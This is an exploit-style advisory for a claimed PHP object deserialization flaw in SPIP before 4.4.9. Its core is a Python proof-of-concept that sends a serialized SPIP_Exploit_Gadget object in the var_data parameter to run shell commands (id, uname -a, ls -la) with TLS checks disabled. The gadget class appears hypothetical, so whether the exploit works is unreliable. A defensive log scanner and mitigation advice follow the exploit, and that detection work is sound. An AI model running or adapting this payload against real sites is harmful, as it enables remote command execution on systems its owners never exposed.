=============================================================================================================================================
| # Title : SPIP Gadget Chain before 4.4.9 Potential PHP Object Deserialization Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.spip.net/en_rubrique25.html |
=============================================================================================================================================

[+] Summary :

This Python script sends a crafted serialized PHP object to a target website in order to test for a potential PHP Object Deserialization vulnerability. It:

- Uses the requests library to send a GET request to a specified target URL.
- Generates a serialized PHP payload referencing a class named SPIP_Exploit_Gadget.
- Injects the payload into the var_data parameter.
- Attempts to trigger command execution (id; uname -a; ls -la) if a vulnerable gadget chain exists on the server.
- Disables SSL certificate verification warnings for testing purposes.
- Prints the HTTP response and checks if command output appears in the response body.

[+] POC :

import requests
import urllib.parse
import urllib3

# Suppress the warning that requests emits when verify=False is used
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Placeholder target; the original script hardcoded a live third-party host here
target_url = "https://target.example"
command_to_run = "id; uname -a; ls -la"


def generate_payload(cmd):
    """
    Generate a PHP serialized payload.
    Note: Success depends on the existence of the 'SPIP_Exploit_Gadget' class
    or an equivalent Gadget Chain within the server-side files.
    """
    # O:<len>:"<class>":<count>:{<props>} is PHP's serialized-object format;
    # 19 is the length of "SPIP_Exploit_Gadget", 7 the length of "command"
    payload = f'O:19:"SPIP_Exploit_Gadget":1:{{s:7:"command";s:{len(cmd)}:"{cmd}";}}'
    return payload


def launch_exploit():
    payload = generate_payload(command_to_run)
    params = {
        'page': 'article',
        'id_article': '1',
        'var_data': payload
    }

    print(f"[*] Sending payload to: {target_url}")
    print(f"[*] Target Command: {command_to_run}")

    try:
        response = requests.get(target_url, params=params, timeout=15, verify=False)
        print("-" * 30)
        print(f"[+] Response Status: {response.status_code}")
        if response.status_code == 200:
            print("[+] Potential output found in response body:")
            print(response.text[:1000])  # Print first 1000 characters for inspection
        else:
            print("[-] Server responded with an error.")
        print("-" * 30)
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection Error: {e}")


if __name__ == "__main__":
    launch_exploit()

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================
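The request shape above (a PHP serialized object carried in a query parameter such as var_data) is easy to spot on the defender's side: PHP's object encoding always starts with O:<name length>:"<class name>":<property count>:{. The following detector, an added example that is not part of the advisory and not SPIP project code, parses the query string of each access-log request line, URL-decodes every parameter, and reports any value that carries a well-formed serialized object together with the class name it references. The log lines are constructed samples; the parameter name var_data and the class name SPIP_Exploit_Gadget are taken from the advisory, and the log format (combined/CLF style) is an assumption.

```python
import re
import urllib.parse

# Start of a serialized PHP object: O:<name length>:"<class name>":<property count>:{
# Class names may contain namespace separators (backslashes).
PHP_OBJECT_RE = re.compile(r'O:(\d+):"([A-Za-z0-9_\\]+)":(\d+):\{')

# Extracts the request line ("GET /path?query HTTP/1.1") from a CLF-style log entry (assumed format)
LOG_RE = re.compile(r'"([A-Z]+ \S+ HTTP/[\d.]+)"')


def find_serialized_objects(value):
    """Return the class names of serialized PHP objects found in a decoded parameter value.
    Only matches whose declared name length equals the actual class-name length are kept,
    which filters out text that merely resembles the format."""
    found = []
    for m in PHP_OBJECT_RE.finditer(value):
        declared_len, class_name = int(m.group(1)), m.group(2)
        if declared_len == len(class_name):
            found.append(class_name)
    return found


def scan_request_line(request_line):
    """Map parameter name -> list of referenced classes for every query parameter
    of an HTTP request line that carries a serialized PHP object."""
    parts = request_line.split()
    if len(parts) < 2:
        return {}
    query = urllib.parse.urlsplit(parts[1]).query
    hits = {}
    # parse_qsl percent-decodes values, so %3A / %22 / %7B become : " {
    for name, value in urllib.parse.parse_qsl(query, keep_blank_values=True):
        classes = find_serialized_objects(value)
        if classes:
            hits[name] = classes
    return hits


def scan_log(lines):
    """Return [(1-based line number, hits)] for log lines carrying serialized PHP objects."""
    alerts = []
    for idx, line in enumerate(lines, 1):
        m = LOG_RE.search(line)
        if not m:
            continue
        hits = scan_request_line(m.group(1))
        if hits:
            alerts.append((idx, hits))
    return alerts


# Constructed sample access-log lines (not real traffic). Line 2 carries the advisory's
# payload with command "id"; line 3 carries a serialized PHP array, which is not an object.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2025:10:00:00 +0000] "GET /spip.php?page=article&id_article=1 HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2025:10:00:01 +0000] "GET /spip.php?page=article&id_article=1'
    '&var_data=O%3A19%3A%22SPIP_Exploit_Gadget%22%3A1%3A%7Bs%3A7%3A%22command%22%3Bs%3A2%3A%22id%22%3B%7D HTTP/1.1" 200 2048',
    '203.0.113.9 - - [01/Jan/2025:10:00:02 +0000] "GET /spip.php?page=article&var_data=a%3A1%3A%7Bi%3A0%3Bs%3A3%3A%22foo%22%3B%7D HTTP/1.1" 200 512',
]


if __name__ == "__main__":
    for line_no, hits in scan_log(SAMPLE_LOG):
        for param, classes in hits.items():
            print(f"line {line_no}: parameter '{param}' references serialized class(es) {classes}")
```

Running it flags only line 2 (var_data referencing SPIP_Exploit_Gadget); the serialized array on line 3 is ignored because only objects can reach a gadget chain. The same length-validated check is usable as a request-side gate in front of any code path that still calls unserialize() on user input, though the durable fix on the PHP side is to refuse object instantiation there outright (unserialize() has accepted an allowed_classes option, settable to false, since PHP 7.0) and to upgrade to the SPIP release named in the title.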